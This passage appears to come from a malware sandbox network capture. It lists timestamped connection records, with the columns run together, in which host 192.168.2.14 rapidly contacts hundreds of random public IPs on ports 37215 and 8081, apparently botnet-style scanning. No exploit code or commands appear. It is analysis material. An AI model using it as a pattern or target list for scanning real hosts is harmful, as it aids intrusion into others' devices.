                                                Jul 20, 2024 23:05:32.970920086 CEST3721526454197.201.186.113192.168.2.14
                                                Jul 20, 2024 23:05:32.970925093 CEST8081267104.188.104.13192.168.2.14
                                                Jul 20, 2024 23:05:32.970928907 CEST372152645480.79.178.61192.168.2.14
                                                Jul 20, 2024 23:05:32.970948935 CEST3721526454157.124.159.15192.168.2.14
                                                Jul 20, 2024 23:05:32.970953941 CEST3721526454197.129.93.34192.168.2.14
                                                Jul 20, 2024 23:05:32.970958948 CEST3721526454157.220.206.134192.168.2.14
                                                Jul 20, 2024 23:05:32.970963001 CEST3721526454197.100.34.28192.168.2.14
                                                Jul 20, 2024 23:05:32.970968008 CEST3721526454170.84.72.112192.168.2.14
                                                Jul 20, 2024 23:05:32.970972061 CEST80812671087.232.28.113192.168.2.14
                                                Jul 20, 2024 23:05:32.970980883 CEST3721526454197.7.153.200192.168.2.14
                                                Jul 20, 2024 23:05:32.970985889 CEST3721526454157.64.217.121192.168.2.14
                                                Jul 20, 2024 23:05:32.970989943 CEST3721526454157.37.72.163192.168.2.14
                                                Jul 20, 2024 23:05:32.970995903 CEST3721526454197.25.53.252192.168.2.14
                                                Jul 20, 2024 23:05:32.970999956 CEST808126710102.189.4.132192.168.2.14
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14116.195.140.247
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14129.151.68.210
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.1436.13.213.163
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.1440.227.51.100
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14200.19.103.103
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14190.193.51.237
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14138.30.175.245
                                                Jul 20, 2024 23:05:32.971067905 CEST267108081192.168.2.14118.130.1.158
                                                Jul 20, 2024 23:05:32.971076012 CEST808126710109.132.220.12192.168.2.14
                                                Jul 20, 2024 23:05:32.971081018 CEST80812671076.219.89.102192.168.2.14
                                                Jul 20, 2024 23:05:32.971085072 CEST808126710189.221.143.149192.168.2.14
                                                Jul 20, 2024 23:05:32.971088886 CEST808126710172.88.4.43192.168.2.14
                                                Jul 20, 2024 23:05:32.971097946 CEST3721526454157.32.138.247192.168.2.14
                                                Jul 20, 2024 23:05:32.971101999 CEST808126710193.146.36.14192.168.2.14
                                                Jul 20, 2024 23:05:32.971107006 CEST3721526454143.121.44.178192.168.2.14
                                                Jul 20, 2024 23:05:32.971111059 CEST3721526454144.183.98.117192.168.2.14
                                                Jul 20, 2024 23:05:32.971441031 CEST3721526454157.60.120.82192.168.2.14
                                                Jul 20, 2024 23:05:32.971457005 CEST3721526454123.137.146.62192.168.2.14
                                                Jul 20, 2024 23:05:32.971509933 CEST3721526454157.14.91.47192.168.2.14
                                                Jul 20, 2024 23:05:32.971514940 CEST808126710132.39.4.182192.168.2.14
                                                Jul 20, 2024 23:05:32.971519947 CEST808126710219.153.41.215192.168.2.14
                                                Jul 20, 2024 23:05:32.971524954 CEST3721526454197.58.91.112192.168.2.14
                                                Jul 20, 2024 23:05:32.971534014 CEST808126710111.105.250.86192.168.2.14
                                                Jul 20, 2024 23:05:32.971539021 CEST808126710176.6.168.169192.168.2.14
                                                Jul 20, 2024 23:05:32.971554995 CEST3721526454157.124.200.93192.168.2.14
                                                Jul 20, 2024 23:05:32.971559048 CEST372152645441.172.220.222192.168.2.14
                                                Jul 20, 2024 23:05:32.971563101 CEST808126710165.255.248.243192.168.2.14
                                                Jul 20, 2024 23:05:32.971569061 CEST372152645441.248.214.89192.168.2.14
                                                Jul 20, 2024 23:05:32.971575022 CEST80812671018.96.96.48192.168.2.14
                                                Jul 20, 2024 23:05:32.971580029 CEST3721526454157.42.39.209192.168.2.14
                                                Jul 20, 2024 23:05:32.971584082 CEST808126710123.238.113.23192.168.2.14
                                                Jul 20, 2024 23:05:32.971589088 CEST808126710117.223.138.94192.168.2.14
                                                Jul 20, 2024 23:05:32.971643925 CEST80812671063.232.14.6192.168.2.14
                                                Jul 20, 2024 23:05:32.971648932 CEST3721526454112.129.68.75192.168.2.14
                                                Jul 20, 2024 23:05:32.971652985 CEST3721526454157.8.14.14192.168.2.14
                                                Jul 20, 2024 23:05:32.971657991 CEST80812671073.52.7.231192.168.2.14
                                                Jul 20, 2024 23:05:32.971667051 CEST372152645445.255.75.247192.168.2.14
                                                Jul 20, 2024 23:05:32.971672058 CEST3721526454197.65.95.250192.168.2.14
                                                Jul 20, 2024 23:05:32.971677065 CEST3721526454157.238.37.225192.168.2.14
                                                Jul 20, 2024 23:05:32.971681118 CEST80812671017.175.244.170192.168.2.14
                                                Jul 20, 2024 23:05:32.971699953 CEST808126710171.198.255.240192.168.2.14
                                                Jul 20, 2024 23:05:32.971704006 CEST372152645441.222.97.171192.168.2.14
                                                Jul 20, 2024 23:05:32.971709013 CEST808126710131.28.50.77192.168.2.14
                                                Jul 20, 2024 23:05:32.971713066 CEST80812671034.191.127.17192.168.2.14
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14157.129.236.98
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14197.204.4.39
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14197.53.41.162
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.1441.160.105.187
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14157.61.20.240
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14157.222.169.210
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.1443.154.204.29
                                                Jul 20, 2024 23:05:32.971784115 CEST2645437215192.168.2.14197.238.43.4
                                                Jul 20, 2024 23:05:32.972275019 CEST808126710122.135.106.228192.168.2.14
                                                Jul 20, 2024 23:05:32.972280979 CEST808126710193.132.254.155192.168.2.14
                                                Jul 20, 2024 23:05:32.972285032 CEST80812671048.150.173.246192.168.2.14
                                                Jul 20, 2024 23:05:32.972429991 CEST80812671099.243.81.85192.168.2.14
                                                Jul 20, 2024 23:05:32.972436905 CEST80812671074.159.45.127192.168.2.14
                                                Jul 20, 2024 23:05:32.972441912 CEST3721526454157.16.161.82192.168.2.14
                                                Jul 20, 2024 23:05:32.972445965 CEST3721526454157.69.223.72192.168.2.14
                                                Jul 20, 2024 23:05:32.972455978 CEST808126710145.127.72.143192.168.2.14
                                                Jul 20, 2024 23:05:32.972460032 CEST372152645441.53.164.225192.168.2.14
                                                Jul 20, 2024 23:05:32.972465038 CEST80812671032.105.9.164192.168.2.14
                                                Jul 20, 2024 23:05:32.972469091 CEST808126710155.25.62.8192.168.2.14
                                                Jul 20, 2024 23:05:32.972477913 CEST80812671062.68.232.116192.168.2.14
                                                Jul 20, 2024 23:05:32.972489119 CEST808126710106.187.126.249192.168.2.14
                                                Jul 20, 2024 23:05:32.972493887 CEST80812671079.65.15.86192.168.2.14
                                                Jul 20, 2024 23:05:32.972497940 CEST808126710168.69.56.63192.168.2.14
                                                Jul 20, 2024 23:05:32.972501993 CEST80812671076.221.113.210192.168.2.14
                                                Jul 20, 2024 23:05:32.972507000 CEST3721526454157.3.183.32192.168.2.14
                                                Jul 20, 2024 23:05:32.972511053 CEST3721526454157.211.160.103192.168.2.14
                                                Jul 20, 2024 23:05:32.972516060 CEST808126710154.96.127.148192.168.2.14
                                                Jul 20, 2024 23:05:32.972520113 CEST80812671068.191.178.8192.168.2.14
                                                Jul 20, 2024 23:05:32.972523928 CEST808126710147.163.123.103192.168.2.14
                                                Jul 20, 2024 23:05:32.972528934 CEST3721526454197.90.23.241192.168.2.14
                                                Jul 20, 2024 23:05:32.972532988 CEST80812671048.192.221.16192.168.2.14
                                                Jul 20, 2024 23:05:32.972537994 CEST80812671076.222.161.22192.168.2.14
                                                Jul 20, 2024 23:05:32.972543955 CEST3721526454157.92.161.18192.168.2.14
                                                Jul 20, 2024 23:05:32.972914934 CEST3721526454157.12.238.255192.168.2.14
                                                Jul 20, 2024 23:05:32.972919941 CEST372152645441.132.119.157192.168.2.14
                                                Jul 20, 2024 23:05:32.972924948 CEST808126710185.10.141.196192.168.2.14
                                                Jul 20, 2024 23:05:32.972929001 CEST80812671093.211.183.151192.168.2.14
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.1470.119.165.179
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.1472.51.13.222
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.1452.144.91.154
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.14150.89.194.250
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.14144.3.205.255
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.1438.141.196.232
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.14137.216.212.224
                                                Jul 20, 2024 23:05:32.972934008 CEST267108081192.168.2.14140.167.178.189
                                                Jul 20, 2024 23:05:32.972939968 CEST372152645441.205.180.45192.168.2.14
                                                Jul 20, 2024 23:05:32.972945929 CEST80812671034.221.214.1192.168.2.14
                                                Jul 20, 2024 23:05:32.972949982 CEST80812671049.252.222.13192.168.2.14
                                                Jul 20, 2024 23:05:32.972965002 CEST3721526454157.117.99.90192.168.2.14
                                                Jul 20, 2024 23:05:32.972970009 CEST808126710186.71.162.228192.168.2.14
                                                Jul 20, 2024 23:05:32.973000050 CEST80812671070.140.34.75192.168.2.14
                                                Jul 20, 2024 23:05:32.973005056 CEST80812671068.142.16.29192.168.2.14
                                                Jul 20, 2024 23:05:32.973010063 CEST3721526454197.162.132.10192.168.2.14
                                                Jul 20, 2024 23:05:32.973014116 CEST80812671077.90.229.150192.168.2.14
                                                Jul 20, 2024 23:05:32.973033905 CEST808126710201.54.101.13192.168.2.14
                                                Jul 20, 2024 23:05:32.973038912 CEST808126710144.212.176.48192.168.2.14
                                                Jul 20, 2024 23:05:32.973042965 CEST80812671019.136.136.40192.168.2.14
                                                Jul 20, 2024 23:05:32.973289967 CEST3721526454197.153.151.246192.168.2.14
                                                Jul 20, 2024 23:05:32.973295927 CEST80812671019.178.203.31192.168.2.14
                                                Jul 20, 2024 23:05:32.973299980 CEST808126710163.101.102.166192.168.2.14
                                                Jul 20, 2024 23:05:32.973304987 CEST3721526454197.102.240.254192.168.2.14
                                                Jul 20, 2024 23:05:32.973329067 CEST80812671019.82.31.160192.168.2.14
                                                Jul 20, 2024 23:05:32.973334074 CEST3721526454157.167.218.66192.168.2.14
                                                Jul 20, 2024 23:05:32.973339081 CEST808126710201.200.204.159192.168.2.14
                                                Jul 20, 2024 23:05:32.973344088 CEST808126710196.195.106.170192.168.2.14
                                                Jul 20, 2024 23:05:32.973347902 CEST808126710108.148.217.67192.168.2.14
                                                Jul 20, 2024 23:05:32.973352909 CEST808126710173.177.143.72192.168.2.14
                                                Jul 20, 2024 23:05:32.973355055 CEST267108081192.168.2.1413.174.150.88
                                                Jul 20, 2024 23:05:32.973356009 CEST267108081192.168.2.14184.250.153.99
                                                Jul 20, 2024 23:05:32.973356009 CEST267108081192.168.2.14123.150.143.150
                                                Jul 20, 2024 23:05:32.973356009 CEST267108081192.168.2.1474.52.65.245
                                                Jul 20, 2024 23:05:32.973356009 CEST2645437215192.168.2.14170.233.211.253
                                                Jul 20, 2024 23:05:32.973356009 CEST2645437215192.168.2.14157.201.151.163
                                                Jul 20, 2024 23:05:32.973356009 CEST2645437215192.168.2.14197.47.165.186
                                                Jul 20, 2024 23:05:32.973356009 CEST2645437215192.168.2.14157.146.42.35
                                                Jul 20, 2024 23:05:32.973416090 CEST2645437215192.168.2.14157.106.248.63
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.14157.133.240.137
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.1441.94.2.212
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.1441.42.147.145
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.14157.248.225.137
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.14197.57.89.198
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.1441.111.126.115
                                                Jul 20, 2024 23:05:32.973417044 CEST2645437215192.168.2.14157.169.29.89
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.14193.24.185.130
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.14197.101.55.74
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.14157.131.171.170
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.14157.252.199.36
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.1441.52.176.189
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.1441.75.56.150
                                                Jul 20, 2024 23:05:32.973560095 CEST2645437215192.168.2.14197.37.73.143
                                                Jul 20, 2024 23:05:32.973561049 CEST2645437215192.168.2.14197.188.161.109
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.14197.128.65.211
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.1441.48.54.73
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.14157.178.119.88
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.14157.141.154.76
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.14170.252.122.10
                                                Jul 20, 2024 23:05:32.973776102 CEST2645437215192.168.2.14197.223.152.68
                                                Jul 20, 2024 23:05:32.973777056 CEST2645437215192.168.2.1441.173.190.214
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.1494.224.13.155
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.14195.6.210.153
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.1486.132.59.231
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.14207.185.26.121
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.1459.80.220.189
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.1464.40.177.253
                                                Jul 20, 2024 23:05:32.973972082 CEST267108081192.168.2.14222.176.137.135
                                                Jul 20, 2024 23:05:32.973973036 CEST267108081192.168.2.1413.64.88.169
                                                Jul 20, 2024 23:05:32.974116087 CEST2645437215192.168.2.1492.14.32.34
                                                Jul 20, 2024 23:05:32.974116087 CEST2645437215192.168.2.14197.127.56.218
                                                Jul 20, 2024 23:05:32.974116087 CEST2645437215192.168.2.14157.120.242.43
                                                Jul 20, 2024 23:05:32.974116087 CEST2645437215192.168.2.1441.7.62.15
                                                Jul 20, 2024 23:05:32.974116087 CEST267108081192.168.2.1480.161.237.245
                                                Jul 20, 2024 23:05:32.974116087 CEST267108081192.168.2.144.188.104.13
                                                Jul 20, 2024 23:05:32.974116087 CEST267108081192.168.2.14172.88.4.43
                                                Jul 20, 2024 23:05:32.974116087 CEST267108081192.168.2.14109.132.220.12
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14110.159.7.176
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14105.48.118.197
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14212.19.214.77
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14198.88.91.70
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14204.51.21.15
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14212.244.103.179
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.1451.155.174.92
                                                Jul 20, 2024 23:05:32.974188089 CEST267108081192.168.2.14194.237.4.184
                                                Jul 20, 2024 23:05:32.976303101 CEST267108081192.168.2.14193.146.36.14
                                                Jul 20, 2024 23:05:32.976303101 CEST267108081192.168.2.14219.153.41.215
                                                Jul 20, 2024 23:05:32.976303101 CEST267108081192.168.2.14176.6.168.169
                                                Jul 20, 2024 23:05:32.976303101 CEST267108081192.168.2.14165.255.248.243
                                                Jul 20, 2024 23:05:32.976303101 CEST267108081192.168.2.14123.238.113.23
                                                Jul 20, 2024 23:05:32.976304054 CEST267108081192.168.2.1463.232.14.6
                                                Jul 20, 2024 23:05:32.976304054 CEST267108081192.168.2.1473.52.7.231
                                                Jul 20, 2024 23:05:32.976304054 CEST267108081192.168.2.14171.198.255.240
                                                Jul 20, 2024 23:05:32.976545095 CEST808126710123.248.86.232192.168.2.14
                                                Jul 20, 2024 23:05:32.976560116 CEST808126710117.245.165.81192.168.2.14
                                                Jul 20, 2024 23:05:32.976566076 CEST808126710132.5.201.125192.168.2.14
                                                Jul 20, 2024 23:05:32.976569891 CEST80812671040.159.161.138192.168.2.14
                                                Jul 20, 2024 23:05:32.976579905 CEST808126710154.84.213.150192.168.2.14
                                                Jul 20, 2024 23:05:32.976584911 CEST808126710209.31.133.182192.168.2.14
                                                Jul 20, 2024 23:05:32.976588964 CEST808126710182.219.207.228192.168.2.14
                                                Jul 20, 2024 23:05:32.976609945 CEST808126710161.115.207.40192.168.2.14
                                                Jul 20, 2024 23:05:32.976613998 CEST808126710220.138.13.222192.168.2.14
                                                Jul 20, 2024 23:05:32.976620913 CEST808126710106.194.179.185192.168.2.14
                                                Jul 20, 2024 23:05:32.976624966 CEST267108081192.168.2.144.217.21.135
                                                Jul 20, 2024 23:05:32.976624966 CEST267108081192.168.2.14156.121.141.32
                                                Jul 20, 2024 23:05:32.976625919 CEST8081267105.71.113.116192.168.2.14
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.1441.206.29.121
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.1441.88.139.101
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.1441.7.174.17
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.14197.94.134.116
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.14198.11.63.32
                                                Jul 20, 2024 23:05:32.976624966 CEST2645437215192.168.2.145.19.50.148
                                                Jul 20, 2024 23:05:32.976630926 CEST808126710222.235.148.149192.168.2.14
                                                Jul 20, 2024 23:05:32.976635933 CEST808126710142.221.68.139192.168.2.14
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.1441.218.98.224
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.14157.6.149.141
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.14157.155.22.19
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.1443.29.48.23
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.14161.213.138.167
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.14159.136.163.6
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.1441.72.58.158
                                                Jul 20, 2024 23:05:32.977057934 CEST2645437215192.168.2.14148.200.19.39
                                                Jul 20, 2024 23:05:32.977087975 CEST808126710209.148.109.196192.168.2.14
                                                Jul 20, 2024 23:05:32.977092981 CEST808126710209.110.250.110192.168.2.14
                                                Jul 20, 2024 23:05:32.977108955 CEST808126710219.160.226.219192.168.2.14
                                                Jul 20, 2024 23:05:32.977113008 CEST808126710146.0.64.7192.168.2.14
                                                Jul 20, 2024 23:05:32.977123022 CEST80812671085.12.92.185192.168.2.14
                                                Jul 20, 2024 23:05:32.977127075 CEST808126710171.5.248.246192.168.2.14
                                                Jul 20, 2024 23:05:32.977132082 CEST808126710160.160.232.193192.168.2.14
                                                Jul 20, 2024 23:05:32.977135897 CEST80812671080.69.194.155192.168.2.14
                                                Jul 20, 2024 23:05:32.977144957 CEST808126710160.231.29.124192.168.2.14
                                                Jul 20, 2024 23:05:32.977149010 CEST808126710154.223.107.127192.168.2.14
                                                Jul 20, 2024 23:05:32.977153063 CEST808126710112.203.189.204192.168.2.14
                                                Jul 20, 2024 23:05:32.977158070 CEST80812671088.115.212.101192.168.2.14
                                                Jul 20, 2024 23:05:32.977171898 CEST808126710132.85.73.24192.168.2.14
                                                Jul 20, 2024 23:05:32.977176905 CEST8081267109.127.97.1192.168.2.14
                                                Jul 20, 2024 23:05:32.977180958 CEST80812671060.150.104.141192.168.2.14
                                                Jul 20, 2024 23:05:32.977185965 CEST808126710148.251.82.84192.168.2.14
                                                Jul 20, 2024 23:05:32.977190971 CEST80812671054.159.244.112192.168.2.14
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.14133.62.206.236
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.14157.92.111.8
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.1468.66.206.222
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.1454.80.38.231
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.14157.167.245.72
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.1441.184.172.132
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.14157.109.125.152
                                                Jul 20, 2024 23:05:32.977276087 CEST2645437215192.168.2.14197.149.249.125
                                                Jul 20, 2024 23:05:32.977351904 CEST2645437215192.168.2.1441.238.176.198
                                                Jul 20, 2024 23:05:32.977353096 CEST2645437215192.168.2.14197.252.50.173
                                                Jul 20, 2024 23:05:32.977353096 CEST2645437215192.168.2.14157.160.177.214
                                                Jul 20, 2024 23:05:32.977353096 CEST2645437215192.168.2.14157.80.130.122
                                                Jul 20, 2024 23:05:32.977353096 CEST2645437215192.168.2.14157.126.100.2
                                                Jul 20, 2024 23:05:32.977353096 CEST2645437215192.168.2.14183.14.240.135
                                                Jul 20, 2024 23:05:32.977353096 CEST267108081192.168.2.14125.204.49.213
                                                Jul 20, 2024 23:05:32.977353096 CEST267108081192.168.2.1487.232.28.113
                                                Jul 20, 2024 23:05:32.977405071 CEST267108081192.168.2.1480.177.168.29
                                                Jul 20, 2024 23:05:32.977405071 CEST267108081192.168.2.1496.148.59.7
                                                Jul 20, 2024 23:05:32.977405071 CEST267108081192.168.2.14223.180.173.76
                                                Jul 20, 2024 23:05:32.977405071 CEST267108081192.168.2.1462.255.143.253
                                                Jul 20, 2024 23:05:32.977405071 CEST2645437215192.168.2.1414.63.31.137
                                                Jul 20, 2024 23:05:32.977405071 CEST2645437215192.168.2.14197.1.71.210
                                                Jul 20, 2024 23:05:32.977405071 CEST2645437215192.168.2.14109.181.16.201
                                                Jul 20, 2024 23:05:32.977405071 CEST2645437215192.168.2.14157.54.214.129
                                                Jul 20, 2024 23:05:32.977679968 CEST80812671072.130.69.78192.168.2.14
                                                Jul 20, 2024 23:05:32.977685928 CEST808126710132.71.241.181192.168.2.14
                                                Jul 20, 2024 23:05:32.977690935 CEST808126710116.195.140.247192.168.2.14
                                                Jul 20, 2024 23:05:32.977695942 CEST808126710173.151.124.222192.168.2.14
                                                Jul 20, 2024 23:05:32.977705956 CEST808126710129.151.68.210192.168.2.14
                                                Jul 20, 2024 23:05:32.977721930 CEST80812671036.13.213.163192.168.2.14
                                                Jul 20, 2024 23:05:32.977726936 CEST808126710159.58.177.248192.168.2.14
                                                Jul 20, 2024 23:05:32.977730989 CEST808126710203.166.85.237192.168.2.14
                                                Jul 20, 2024 23:05:32.977796078 CEST808126710101.221.153.89192.168.2.14
                                                Jul 20, 2024 23:05:32.977799892 CEST80812671019.149.244.32192.168.2.14
                                                Jul 20, 2024 23:05:32.977804899 CEST808126710135.187.104.178192.168.2.14
                                                Jul 20, 2024 23:05:32.977824926 CEST2645437215192.168.2.14157.100.78.242
                                                Jul 20, 2024 23:05:32.977824926 CEST2645437215192.168.2.14157.92.253.19
                                                Jul 20, 2024 23:05:32.977824926 CEST2645437215192.168.2.14157.124.159.15
                                                Jul 20, 2024 23:05:32.977824926 CEST2645437215192.168.2.14157.220.206.134
                                                Jul 20, 2024 23:05:32.977824926 CEST267108081192.168.2.14102.189.4.132
                                                Jul 20, 2024 23:05:32.977824926 CEST267108081192.168.2.14189.221.143.149
                                                Jul 20, 2024 23:05:32.977824926 CEST267108081192.168.2.14111.105.250.86
                                                Jul 20, 2024 23:05:32.977824926 CEST267108081192.168.2.1418.96.96.48
                                                Jul 20, 2024 23:05:32.977845907 CEST80812671040.227.51.100192.168.2.14
                                                Jul 20, 2024 23:05:32.977850914 CEST80812671017.167.164.197192.168.2.14
                                                Jul 20, 2024 23:05:32.977855921 CEST80812671092.227.24.56192.168.2.14
                                                Jul 20, 2024 23:05:32.977860928 CEST808126710198.108.55.247192.168.2.14
                                                Jul 20, 2024 23:05:32.977869034 CEST80812671097.157.149.39192.168.2.14
                                                Jul 20, 2024 23:05:32.977933884 CEST808126710112.94.187.67192.168.2.14
                                                Jul 20, 2024 23:05:32.977938890 CEST808126710197.113.230.79192.168.2.14
                                                Jul 20, 2024 23:05:32.977942944 CEST808126710134.192.178.255192.168.2.14
                                                Jul 20, 2024 23:05:32.978005886 CEST2645437215192.168.2.1449.217.8.89
                                                Jul 20, 2024 23:05:32.978005886 CEST2645437215192.168.2.14157.126.251.169
                                                Jul 20, 2024 23:05:32.978005886 CEST2645437215192.168.2.1441.223.182.211
                                                Jul 20, 2024 23:05:32.978005886 CEST2645437215192.168.2.14157.111.136.209
                                                Jul 20, 2024 23:05:32.978007078 CEST2645437215192.168.2.14197.183.61.7
                                                Jul 20, 2024 23:05:32.978007078 CEST2645437215192.168.2.14197.151.70.119
                                                Jul 20, 2024 23:05:32.978161097 CEST267108081192.168.2.14193.132.254.155
                                                Jul 20, 2024 23:05:32.978161097 CEST267108081192.168.2.1474.159.45.127
                                                Jul 20, 2024 23:05:32.978161097 CEST267108081192.168.2.14155.25.62.8
                                                Jul 20, 2024 23:05:32.978266001 CEST80812671095.119.149.193192.168.2.14
                                                Jul 20, 2024 23:05:32.978368044 CEST808126710184.191.112.115192.168.2.14
                                                Jul 20, 2024 23:05:32.978373051 CEST80812671019.214.235.33192.168.2.14
                                                Jul 20, 2024 23:05:32.978378057 CEST808126710209.209.65.203192.168.2.14
                                                Jul 20, 2024 23:05:32.978384018 CEST808126710200.19.103.103192.168.2.14
                                                Jul 20, 2024 23:05:32.978394032 CEST808126710190.193.51.237192.168.2.14
                                                Jul 20, 2024 23:05:32.978399038 CEST808126710204.47.171.208192.168.2.14
                                                Jul 20, 2024 23:05:32.978414059 CEST808126710136.115.206.23192.168.2.14
                                                Jul 20, 2024 23:05:32.978419065 CEST808126710138.30.175.245192.168.2.14
                                                Jul 20, 2024 23:05:32.978423119 CEST808126710174.14.116.207192.168.2.14
                                                Jul 20, 2024 23:05:32.978426933 CEST808126710118.130.1.158192.168.2.14
                                                Jul 20, 2024 23:05:32.978477001 CEST80812671057.210.21.203192.168.2.14
                                                Jul 20, 2024 23:05:32.978482008 CEST80812671060.58.246.160192.168.2.14
                                                Jul 20, 2024 23:05:32.978579044 CEST80812671013.174.150.88192.168.2.14
                                                Jul 20, 2024 23:05:32.978738070 CEST80812671082.172.108.153192.168.2.14
                                                Jul 20, 2024 23:05:32.978743076 CEST80812671081.238.47.164192.168.2.14
                                                Jul 20, 2024 23:05:32.978786945 CEST808126710123.97.246.157192.168.2.14
                                                Jul 20, 2024 23:05:32.978849888 CEST80812671070.119.165.179192.168.2.14
                                                Jul 20, 2024 23:05:32.978904963 CEST80812671038.199.41.88192.168.2.14
                                                Jul 20, 2024 23:05:32.979007006 CEST808126710184.250.153.99192.168.2.14
                                                Jul 20, 2024 23:05:32.979141951 CEST808126710110.159.7.176192.168.2.14
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.1434.191.127.17
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.1448.150.173.246
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.14106.187.126.249
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.1476.221.113.210
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.14147.163.123.103
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.1468.191.178.8
                                                Jul 20, 2024 23:05:32.979197979 CEST267108081192.168.2.1476.222.161.22
                                                Jul 20, 2024 23:05:32.979348898 CEST80812671072.51.13.222192.168.2.14
                                                Jul 20, 2024 23:05:32.979422092 CEST808126710105.48.118.197192.168.2.14
                                                Jul 20, 2024 23:05:32.979615927 CEST80812671094.224.13.155192.168.2.14
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.1476.219.89.102
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.14132.39.4.182
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.14117.223.138.94
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.1417.175.244.170
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.14131.28.50.77
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.14145.127.72.143
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.1493.211.183.151
                                                Jul 20, 2024 23:05:32.979626894 CEST267108081192.168.2.14186.71.162.228
                                                Jul 20, 2024 23:05:32.979630947 CEST808126710212.19.214.77192.168.2.14
                                                Jul 20, 2024 23:05:32.979681969 CEST808126710195.6.210.153192.168.2.14
                                                Jul 20, 2024 23:05:32.979715109 CEST808126710123.150.143.150192.168.2.14
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.14157.232.206.115
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.1441.188.75.2
